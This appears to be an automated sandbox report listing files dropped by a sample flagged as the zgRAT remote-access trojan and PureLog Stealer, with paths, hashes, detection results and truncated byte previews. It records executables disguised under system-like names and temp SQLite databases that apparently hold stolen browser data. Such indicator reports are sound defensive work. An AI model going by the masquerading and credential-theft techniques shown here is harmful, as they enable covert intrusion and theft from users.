Preview:	o74VvikncfTVGpu8DI072VX9KEaqYHjrva3RyB10poUJk514rLcIPInTk4KrH3PU5ljpwdJCRASNAOYPNg9Npbcnwjq30JsvZAN8VLINBa1OzZTWf5el4CpeJ62MwQLHRgyAAa3BXvLOkNxXQUX4pH1XVszZS6avOt7TlTVFCcNI0a45If6c2RbJpaoSldtbVaA0Qev79S1N3sg4y4RwA826RxnKoCejtwxaZDont9dkZOQ64tdqL6bXhDid0lS6xSeH5GeuPnCBeShDhqQ4jxXwUZ3WeLxIqhwHtIBxPsai3a2Ogf6KUYXA4swfNIQE04U7gZTYpcp0Xz24ho09OmxSKvMBWfkGcVs9F5rGLhe2shnFz18iSQ0NHCxuMRBK2iXBG3ym7txqI5jmIGMegCyLfe2DH634gT9KJm85CWlidJELdKmFFho0uLfmBveAz3Kz5YdgIQbKaPsWZqj7Uxz8pJZ8GW4R2ltj8PQErF7yFeZecIMVLgpBEMJw9eavWKRzg

C:\Program Files (x86)\Google\wDyQbcxdSUUjszASb.exe

Download File

Process:	C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1922560
Entropy (8bit):	7.535542151434719
Encrypted:	false
SSDEEP:	24576:6fDcXgugMu1XHi1yxsP7S5Aj59NKBbNVu39p/Zy1xU7r7khR6+JB65hzxkxBLEV:6wXgLGzS5PgtFZyHU7khRdJg5srL
MD5:	73E7655A3D54309A3CCFB3B9CA197652
SHA1:	BB6B131E8AD43F0064C259ABC266394FE75F76DC
SHA-256:	70683DDAB7E1CB04128D4FB61BE2CD61B6A5149C429145FAF5B9F239A4FFAC21
SHA-512:	E0D0C8D34DC59DCB49E8D465A03CA13D13114EC153CFB3ECEBAD961FA260961509BBED8A90146E66A0AA0321363F0AF733C0779EE7C4121C0A1F63BAD17CCD65
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Google\wDyQbcxdSUUjszASb.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\wDyQbcxdSUUjszASb.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5pg.................N..........Nm... ........@.. ....................................@..................................m..K....... ............................................................................ ............... ..H............text...TM... ...N.................. ..`.rsrc... ............P..............@....reloc...............T..............@..B................0m......H...............................rl.......................................0..........(.... ........8........E....).......M...\...8$...(.... ....~~...{....9....& ....8....(.... ....~~...{f...9....& ....8....(.... ....8....*....0..'....... ........8........E........................9...M...8....8.... ....8.......... ....~~...{....:....& ....8....~....9.... ....8........~....(n...~....(r... ....<U... ....~~...{....9\...& ....8Q...~....(f... .... .... ....s....~....(j....... ....8.

C:\Program Files (x86)\Windows Photo Viewer\3734501469df7e

Download File

Process:	C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe
File Type:	ASCII text, with very long lines (502), with no line terminators
Category:	dropped
Size (bytes):	502
Entropy (8bit):	5.878503754960924
Encrypted:	false
SSDEEP:	12:H4LL2e1Rkm4f8SpUudF24cmS/15WsMi96lKwTi5urZ//oJ:HGR16EtuiLWZikXu5ux/oJ
MD5:	6C168CAE464274B6EBAB9C49215AC0AC
SHA1:	E652A44EE0330C81A98BF16F4DDC49BD5FD91B1E
SHA-256:	329C3B3691E5F07D331897A0AD8AE902A4E2F14F4E77FA409E12913D3735CD69
SHA-512:	D73CD619064267B69B661CA5241FE29956505C9EBB5E6711160D62F8101C9297CEE9B2D6826A927A7E390DBAA208443E99EB4B549EC8813558BDC80142F49619
Malicious:	false
Preview:	OzJAJG5ZLwNvnaD5xX7MjazKjqjbyCgSD4pomEPjg7Mx72S7UOC3Gm5y99achekIP4rsvYTtIYpmNBMrYmGjAmLa90omnwCCWEhCLjM55Svr7Sk7wtE4XBHmsQs4uqFWVmPJeJfzaLor1edqQqz4sHpV64U40RLONZVVDbdnNOeMWavOxBnD0LnO73Mjzk8I9ZecIHnzNMqdnc8fJFHzoIYBvHYJO4ynQVM76SGpYy0ofKke5qZudJe1BcrAtdkSYCMRQBj08cazRtfkh3OheDKH1V6dlG54NhQc8SO3HjwAsojR6Hc0PDyU2Fa4EGP1ggludDlOpUa5RJYMwpgeoFoKs6k32TyAT4eMDyx3fNK4m3CsqNHZkvNb1aBhcsWVgZlXpMJ71m8a5uhz41MpLZairDUmxQaw1yYNRoDdEKi7wwgH3LnlfrJH9Dpm2gKlLMjGWUhPxtkB0cw5hNtlnzRKoRNO9bli97vkMZvioYxwGIQgRuFowi

C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Download File

Process:	C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1922560
Entropy (8bit):	7.535542151434719
Encrypted:	false
SSDEEP:	24576:6fDcXgugMu1XHi1yxsP7S5Aj59NKBbNVu39p/Zy1xU7r7khR6+JB65hzxkxBLEV:6wXgLGzS5PgtFZyHU7khRdJg5srL
MD5:	73E7655A3D54309A3CCFB3B9CA197652
SHA1:	BB6B131E8AD43F0064C259ABC266394FE75F76DC
SHA-256:	70683DDAB7E1CB04128D4FB61BE2CD61B6A5149C429145FAF5B9F239A4FFAC21
SHA-512:	E0D0C8D34DC59DCB49E8D465A03CA13D13114EC153CFB3ECEBAD961FA260961509BBED8A90146E66A0AA0321363F0AF733C0779EE7C4121C0A1F63BAD17CCD65
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5pg.................N..........Nm... ........@.. ....................................@..................................m..K....... ............................................................................ ............... ..H............text...TM... ...N.................. ..`.rsrc... ............P..............@....reloc...............T..............@..B................0m......H...............................rl.......................................0..........(.... ........8........E....).......M...\...8$...(.... ....~~...{....9....& ....8....(.... ....~~...{f...9....& ....8....(.... ....8....*....0..'....... ........8........E........................9...M...8....8.... ....8.......... ....~~...{....:....& ....8....~....9.... ....8........~....(n...~....(r... ....<U... ....~~...{....9\...& ....8Q...~....(f... .... .... ....s....~....(j....... ....8.

C:\Program Files\Microsoft Office 15\ClientX64\3734501469df7e

Download File

Process:	C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	126
Entropy (8bit):	5.652415217096039
Encrypted:	false
SSDEEP:	3:I4trAUn4TfFmVnisd6nzTPvjCaSNmNpBuXR8C3HnoLduwuRrn:I4O+4Tdm5i1n/P7o0HBITHnoLduw0n
MD5:	F1B46E54F1B518E2ED982D01F52DB585
SHA1:	646F7CE72F148094CC1B8BBFD2BB41F1BEC4C03E
SHA-256:	4AE8E8B52EA870845794DD43773C9352E42886F8B91944CECE344B92C7210A16
SHA-512:	6C705855B69A7E8B2B2F215A5C7D1EC11ABA4E9EF0AFD9E11C30CEE1FF6410257947ECF7D0100605C7A0892AEB9B6C7A0A7696A80385D4EE74944F905FCF37F1
Malicious:	false
Preview:	CB3qLsHcK7OBeDgBr7PW7va9Zpx7qcUIbpEGWzFB7MmlsUZW5DYWAAKQk4Rg5JvsmGkz8ao21NYuIzQFPbCmD8IaexfbijGya39mtjXfYgewlZHvoLQdHIpn8KUK4N

C:\Program Files\Microsoft Office 15\ClientX64\wDyQbcxdSUUjszASb.exe

Download File

Process:	C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1922560
Entropy (8bit):	7.535542151434719
Encrypted:	false
SSDEEP:	24576:6fDcXgugMu1XHi1yxsP7S5Aj59NKBbNVu39p/Zy1xU7r7khR6+JB65hzxkxBLEV:6wXgLGzS5PgtFZyHU7khRdJg5srL
MD5:	73E7655A3D54309A3CCFB3B9CA197652
SHA1:	BB6B131E8AD43F0064C259ABC266394FE75F76DC
SHA-256:	70683DDAB7E1CB04128D4FB61BE2CD61B6A5149C429145FAF5B9F239A4FFAC21
SHA-512:	E0D0C8D34DC59DCB49E8D465A03CA13D13114EC153CFB3ECEBAD961FA260961509BBED8A90146E66A0AA0321363F0AF733C0779EE7C4121C0A1F63BAD17CCD65
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5pg.................N..........Nm... ........@.. ....................................@..................................m..K....... ............................................................................ ............... ..H............text...TM... ...N.................. ..`.rsrc... ............P..............@....reloc...............T..............@..B................0m......H...............................rl.......................................0..........(.... ........8........E....).......M...\...8$...(.... ....~~...{....9....& ....8....(.... ....~~...{f...9....& ....8....(.... ....8....*....0..'....... ........8........E........................9...M...8....8.... ....8.......... ....~~...{....:....& ....8....~....9.... ....8........~....(n...~....(r... ....<U... ....~~...{....9\...& ....8Q...~....(f... .... .... ....s....~....(j....... ....8.

C:\Program Files\Windows Defender\en-US\3734501469df7e

Download File

Process:	C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe
File Type:	ASCII text, with very long lines (839), with no line terminators
Category:	dropped
Size (bytes):	839
Entropy (8bit):	5.902661333513313
Encrypted:	false
SSDEEP:	24:UmftELXP4EfN1cObGOkaJVqK5HRgk/6DC:bfWXP48cW9T55xgk/d
MD5:	9653FB2787AB809B5EF5BB7D18DE4E62
SHA1:	B43E69DF4A0BDA334CB1AB3D00F9CF73B0EBC168
SHA-256:	81ACED49F296A6748250DEB7135266B7B88525D6D1797D1841157C21D1BE24A2
SHA-512:	7D541412704D8BE355BAD25DA5DB9F6897C1E6FA1EFD0A59622FA488549E82FF6D015AD6D8109B1156E096299744A73E331A447E65B48DDCCBC6F3EB12F3624B
Malicious:	false
Preview:	A3Lt5f7JjFV5rewGdFMpMb5Mk8SuC5qQZLDT8CD8clxE63yplD6aEknj78J6NNGoZFgfadHbBNNkn0PqJnI98PLzieV93HvPfJp1XSOI6eZ1XD5HscwjEHpK3q76IHh4b7FeLYT1ZACd0UceiNRaULKXef8rURAz7eZZ7b6UI5KEFLTiNcX40GjPwr9pamgH9NgV5DhHR7SYBGSTLZd14G805JmPbQ3gZDE1o7mK5Qn3yLOqZqeAIoM3OqawaRpADv97BaoNxT6ncFBt460uw3Xu0Lm8h0tokmzDMQo9BQNzsjaIoq1eb5OKXOHzxqq7kRD0Q8hnR0sgpiCRvdT08ONpYpq7JyLVjQObfk2qJNNkMseyMzETX08WEYblSkecpX6ZTlvLlmruBncqK1vTu17tR2WHIRYitu4yvEelE2suINUa5vaazKsyZNIbOoDTNIBQsn4GWJP1INkEi6LW18tjCGZi6DXZzYgAMDsS1UDp50pMmD3RdqcPYbOmOVJTwzCtqj2eO3fg4EoLaM62KF6I6RmuzFDfKu2Fy6gCLYDjL5VTxDMBZRIr33xZ7HoIzAWJMjXeq3qvBW7A5S6v2BF2mKL4IGFEu4uKjLHOqsUgkWqg5wdpK3Qx4dhBXcVkymBGmwbtLsFKrjRPeo9VnZ30o6QFoF1OWur8Vj4IVtecxFGUMRhsc97YsKbqgWFF01x61T44u0A35aDjz52WiIvXxTPKINl8oYl5SKc3Xm7l8DcSH20kdtgsGaIiDuwgOBOgyHRpc985KJYt07CPXBf513z1B4zn0bW7y5d9lLIeukh6BYrGrgJNgTp5RZniJVFtwb5

C:\Program Files\Windows Defender\en-US\wDyQbcxdSUUjszASb.exe

Download File

Process:	C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1922560
Entropy (8bit):	7.535542151434719
Encrypted:	false
SSDEEP:	24576:6fDcXgugMu1XHi1yxsP7S5Aj59NKBbNVu39p/Zy1xU7r7khR6+JB65hzxkxBLEV:6wXgLGzS5PgtFZyHU7khRdJg5srL
MD5:	73E7655A3D54309A3CCFB3B9CA197652
SHA1:	BB6B131E8AD43F0064C259ABC266394FE75F76DC
SHA-256:	70683DDAB7E1CB04128D4FB61BE2CD61B6A5149C429145FAF5B9F239A4FFAC21
SHA-512:	E0D0C8D34DC59DCB49E8D465A03CA13D13114EC153CFB3ECEBAD961FA260961509BBED8A90146E66A0AA0321363F0AF733C0779EE7C4121C0A1F63BAD17CCD65
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5pg.................N..........Nm... ........@.. ....................................@..................................m..K....... ............................................................................ ............... ..H............text...TM... ...N.................. ..`.rsrc... ............P..............@....reloc...............T..............@..B................0m......H...............................rl.......................................0..........(.... ........8........E....).......M...\...8$...(.... ....~~...{....9....& ....8....(.... ....~~...{f...9....& ....8....(.... ....8....*....0..'....... ........8........E........................9...M...8....8.... ....8.......... ....~~...{....:....& ....8....~....9.... ....8........~....(n...~....(r... ....<U... ....~~...{....9\...& ....8Q...~....(f... .... .... ....s....~....(j....... ....8.

C:\Recovery\f3b6ecef712a24

Download File

Process:	C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	99
Entropy (8bit):	5.478716185754006
Encrypted:	false
SSDEEP:	3:/qzKmoc8OKm1wAWmkhCxDq4smWN8Atb812g:/WoKKmCK4x4sjk2g
MD5:	BFE2AC5634D3837F54492240E0B934E9
SHA1:	94E82EE5A63998025C8E3B4881F47AE60630600C
SHA-256:	1F750A7D506EE07C1884D8F8E8B00344B334939301A640EB6CC534A2209EA5AC
SHA-512:	6B3036A611EFEC3E23231E5AC6D4FF3641C6B4B85E33FC643A09F4DFD6D33E4A9261EF80E793AD63ADBB12C7CEB1C7C1E03BC8CBF49C51FFB2B39077A9CF0BB0
Malicious:	false
Preview:	ptxXTmqROVojOMkLMMpBF26Ayjak4IJmVPfKZ79e3CAd9xb16DUSqxAwxwitMGXGMCN9ravPNKIC2cBAIio1x06iOsWmYPSxp3R

C:\Recovery\spoolsv.exe

Download File

Process:	C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1922560
Entropy (8bit):	7.535542151434719
Encrypted:	false
SSDEEP:	24576:6fDcXgugMu1XHi1yxsP7S5Aj59NKBbNVu39p/Zy1xU7r7khR6+JB65hzxkxBLEV:6wXgLGzS5PgtFZyHU7khRdJg5srL
MD5:	73E7655A3D54309A3CCFB3B9CA197652
SHA1:	BB6B131E8AD43F0064C259ABC266394FE75F76DC
SHA-256:	70683DDAB7E1CB04128D4FB61BE2CD61B6A5149C429145FAF5B9F239A4FFAC21
SHA-512:	E0D0C8D34DC59DCB49E8D465A03CA13D13114EC153CFB3ECEBAD961FA260961509BBED8A90146E66A0AA0321363F0AF733C0779EE7C4121C0A1F63BAD17CCD65
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\spoolsv.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\spoolsv.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\spoolsv.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\spoolsv.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\spoolsv.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\spoolsv.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\spoolsv.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\spoolsv.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5pg.................N..........Nm... ........@.. ....................................@..................................m..K....... ............................................................................ ............... ..H............text...TM... ...N.................. ..`.rsrc... ............P..............@....reloc...............T..............@..B................0m......H...............................rl.......................................0..........(.... ........8........E....).......M...\...8$...(.... ....~~...{....9....& ....8....(.... ....~~...{f...9....& ....8....(.... ....8....*....0..'....... ........8........E........................9...M...8....8.... ....8.......... ....~~...{....:....& ....8....~....9.... ....8........~....(n...~....(r... ....<U... ....~~...{....9\...& ....8Q...~....(f... .... .... ....s....~....(j....... ....8.

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SurrogatesessionRuntimeBrokerDhcp.exe.log

Download File

Process:	C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1396
Entropy (8bit):	5.350961817021757
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
MD5:	EBB3E33FCCEC5303477CB59FA0916A28
SHA1:	BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
SHA-256:	DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
SHA-512:	663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\spoolsv.exe.log

Download File

Process:	C:\Recovery\spoolsv.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.354334472896228
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
MD5:	9F9FA9EFE67E9BBD165432FA39813EEA
SHA1:	6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256:	4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512:	F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\wDyQbcxdSUUjszASb.exe.log

Download File

Process:	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.354334472896228
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
MD5:	9F9FA9EFE67E9BBD165432FA39813EEA
SHA1:	6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256:	4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512:	F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Temp\B1ndxXx0wC

Download File

Process:	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\CMOXGsTQML

Download File

Process:	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\CzgPGatNuc

Download File

Process:	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\E7qKnQdHTf

Download File

Process:	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\HyN2kllOvC

Download File

Process:	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Ic6O6ZFkeP

Download File

Process:	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
